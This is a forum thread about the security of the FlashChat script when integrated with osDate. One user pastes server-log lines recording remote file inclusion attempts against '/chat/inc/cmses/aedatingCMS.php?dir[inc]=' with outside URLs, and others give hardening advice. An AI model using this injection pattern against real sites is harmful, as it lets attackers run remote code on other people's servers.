I have posted this here as this is an enquiry and not an issue.

My enquiry is that as a new user to osdate v2.04 I am considering purchasing flashchat so that I can integrate it with osdate.

However, having read some of the issues that seem to have arisen in the flashchat-osdate forum, I have would like to seek some answers/assurance before committing to a purchase of flashchat.

Firstly, I see that there is an issue with flash chat not recognising the osdate cms and that there is a file called osdateCMS.php to be installed, my question is, has that file now been updated into flashchat itself or do I have to download and add it in myself into flashchat once I have purchased flashchat?

Next up, I read that the flashchat install looks for the osdate config.php file in the root. What puzzles me is that I don't have a config.php file in my osdate directory, although I do have config.inc.php file. Can someone explain this for me?

Thanks in advance.

A bit of advice from a professional programmer : DON'T use Flashchat.

Sorry for Darren, I wish him all the income and best wishes, but having struggled with Flashchat, having been hacked. GODDAMN! It's just not worth it.

Go for this : http://www.userplane.com/ (http://http://www.userplane.com/).

After this, make up your own mind. Tempting to use Flashchat, I know ... having been there. :rolleyes:

(If after using Flashchat yur site gets hacked, worse : yur server gets hacked : "BOO-BOO-WHOO!" :mad:, no pity from me)

I'm sorry to hear that you had a bad user experience with Flashchat, but I cannot help wondering that if your site was hacked into because of Flashchat.

a) Did you report back to Tufat, that your site was hacked and that you believe or had found the security vulnerability with Flashchat?

b) Was there any help and assistance from Tufat because of the security vulnerability you reported? Afterall the flashchat script is one that is purchased.

c) Was the security vulnerability patched up and was there notification of this via these forums to other users?

d) If the script still has security vulnerabilities, then it wouldn't there be more users raising the alarm and therefore the script should at least carry warnings if not taken off sale?

I will look at userplane and make comparisons with flashchat.

Just a note that there is not anything out there that is 100%
not even Userplane
anything that has been reported here on the forum and to Darren has always had some type of fix (granted not over night)
If you do decide to use flashchat and have any problems just post back here and or pm Darren directly
Another thing you could do is booby trap the parts of the chat folders that you do not want people to view access to :D

I hear what you are saying about the 'booby traps' Eric. http://forum.tufat.com/images/icons/icon10.gif Perhaps, you could share some info on this once I have purchased and installed flashchat.

I will indeed give Flashchat a go, because I have seen userplane and the demo of Flashchat, and in my opinion, Flashchat looks cleaner. Userplane has definitely comes across as a top heavy 3rd party commercial application, and it seems to me to be a bit fussy.

Hello Sir,

I have licens for flashchat too and installed it for osdate for testing. The chat works fine and is easy to modify, if problems, Eric is somehow always one of the first to reply in the forum aswell.

Just remember to toogle cms system during install at one of the first steps and choose osdate. Then second, you'd have to apply the link to chatadmin in admins panel manually.

Off you go, haven't had any problems yet. Experienced the chat running fast and slow, but I take it was my host as FTP and website ran slow too. :)

Besides, $5 isn't that bad for a nights hobby - You'd spend more going out with the mrs' ;)

regards,

Hi,
if you want to use flashchat for free, try this solution as posted here:
http://forum.tufat.com/showthread.php?t=37680

The idea is that you will also be able to increase the number of users on the chat server...
:)

Hi,
if you want to use flashchat for free, try this solution as posted here:
http://forum.tufat.com/showthread.php?t=37680

The idea is that you will also be able to increase the number of users on the chat server...
:)
Nice offer, and tempting but I have to be honest and say, that seeing that I am only just starting out and tipping my toes into the water, so to speak, I would like to see something up and running first, before diving straight in.

Although, I shall monitor this with interest as I do believe it has great potential and carries benefit if quite a few sites join one chat host.
(however, I am wondering if your major bug would be the same usernames from different sites - and how this would be overcome as I wouldn't want any potential users from my site to experience any issues, where they connect to a 3rd party site)

In the meantime, Erik gimme some info on these "booby traps" http://forum.tufat.com/images/icons/icon7.gif
I have now installed flashchat, and I am looking at setting the chmods and .htaccess up correctly, any sound advice you can offer, would be most appreciated?

Well burton,

feel free to join anyways and see it in action. Not much efford needed on your side. Just copying 3 files into your chat directory. Then you can see it running the same way as if you would have installed it locally.

I do know how to overcome the "bug" and will implement it, when i have more sites on the system. The bug would only show up if 2 people with the same name are online at the same time.

a) Did you report back to Tufat, that your site was hacked and that you believe or had found the security vulnerability with Flashchat?
The problem WAS Flashchat. Similar reportings on the forum of the same hacking. Also a solution which I quickly installed.

b) Was there any help and assistance from Tufat because of the security vulnerability you reported? Afterall the flashchat script is one that is purchased.

Yes.

c) Was the security vulnerability patched up and was there notification of this via these forums to other users?

Patch followed later. Since I am a professional programmer, I applied my own solution from the stuff I got from the website.

d) If the script still has security vulnerabilities, then it wouldn't there be more users raising the alarm and therefore the script should at least carry warnings if not taken off sale?
Its cheap, easy to install, and has some nice featured. But having develloped a professional view on Flashchat : as nice as it is, it just gives me chivers.

:rolleyes:

P.S. The thing is : they installed a file on my webserver, which I share with a couple hunderd more websites. As I was quick to act, the wrong doeers didn't get time to abuse it. It was some Turkish group of Hackers. Ranting and raving about Palestine, Isreal and shit.

After that, I kept a close eye on my server logs. Below is part of it :

/chat/inc/cmses/aedatingCMS.php 5648 2.831%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://freewebtown.... 1599 0.802%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://bhtvradio.co... 1057 0.530%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://88.84.140.10... 524 0.263%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.med.ualb... 369 0.185%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.tvorivas... 290 0.145%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.tvorivas... 285 0.143%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.bhtvradi... 254 0.127%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.2you2.de... 143 0.072%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.bhtvradi... 123 0.062%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.buuu.alt... 113 0.057%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.samasgil... 78 0.039%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.tvorivas... 70 0.035%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.tvorivas... 68 0.034%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://bhtvradio.co... 48 0.024%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://perqafohu.co... 47 0.024%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://kama.opensol... 41 0.021%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.rubatex.... 38 0.019%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kariwuhr... 34 0.017%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://contactoscon... 28 0.014%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://minng2.iespa... 25 0.013%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://version22.ie... 24 0.012%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.theaweso... 24 0.012%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sni-labs... 23 0.012%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://icezinhu.by.... 22 0.011%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://serv21.hosti... 20 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.freewebs... 20 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://servicioscon... 20 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.acuariop... 19 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.rubatex.... 19 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://bhtvradio.co... 18 0.009%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://pepedo.iespa... 18 0.009%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://humoreloco.i... 18 0.009%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://rugbyguide.c... 16 0.008%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.ces.karl... 14 0.007%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.dataeco.... 13 0.007%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://humoreloco.i... 13 0.007%
/themes/purple/style/images/right.gif 2990 1.499%
/admin/images/arrow_ltr.png 2726 1.366%
/chat/inc/cmses/aedating4CMS.php 2371 1.189%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://perqafohu.c... 516 0.259%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://br.geocitie... 424 0.213%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tvoriva... 305 0.153%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tvoriva... 289 0.145%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://65.254.61.5... 127 0.064%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tvoriva... 123 0.062%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.buuu.al... 95 0.048%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tvoriva... 53 0.027%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.rubatex... 44 0.022%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://00e06b1.net... 40 0.020%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://wwop.org/cg... 38 0.019%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://61.19.55.25... 38 0.019%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://en.gov.ua/d... 35 0.018%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://caurusapulu... 35 0.018%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.allmir.... 26 0.013%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://minng2.iesp... 24 0.012%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://divertingne... 20 0.010%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://channels.da... 18 0.009%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://pepedo.iesp... 17 0.009%
Yes boys and girls, about 10.000 (!) hacking attempts.

WHO DOESN'T GET CYNICAL ABOUT THAT MANY HACK ATTACKS ON ONE'S SERVER!

Titan, thank your for the responses, I have carried out some global searches within the forum, and to my dismay, there doesn't seem to be any conclusive results which give advice on the security of flashchat.

I have looked for global chmod settings of flashchat.
I have looked for .htacess info for flashchat.
I have also looked for hacking for flashchat, which returns many many pages with users who mention that they have been hacked. However, I have no idea if the fixes offered within the forum, have actually been implemented into flashchat?:confused:

I have identified a few users within the global forum, who seemto be knowledgeable with both osdate and flashchat, so I may well pester them for some info/advice.

Furthermore, one could spend all day and night going through the postings to find things out. I am left with the distinct impression it's a case of go with the flow, and if and when a security issue occurs, I should report back here to the forum and seek help/advice.

To which end, I have decided that I shall review flashchat within my site and decide how I want it to be used, then I shall come back to the forum and seek advice on what can be deleted from the server if it is not required and if it cannot be deleted what chmod setting instead. (or commenting out code within a file if applicable) and also what info I can be given on in respect to a .htaccess file within flashchat.

That seems like a logical and responsible aproach ;)

Been about 3/4 of a year since I struggled with Flashchat, but here are some tips of mine which I remembered :

- above all else, disable the file sharing and uploading capabilities in Flashchat
- remove all but one files from the '/chat/inc/cmses/'directory, but keep the file you need to connect it to your CMS software (which is OsDate I take it?)
- I attached a ZIP file with the layouts I modified, to be placed in the layouts directory, and a httaccess file to be placed in the admin directory of Flashchat. You need to modify the httaccess file, in the line where it reads :
allow from XXXXXXXXXXXXXXX. Replace the XX's with your own IP. This will only make the admin directory accessible to yourself.

Well, my two cents. Best of luck

P.S. The layouts I added are for not showing the uplaod functions. Also : *alert* disable the functions in the config files (very important!)

Titan, thanks for the help, it's much appreciated.

Titan, thanks for the help, it's much appreciated.

Take care :D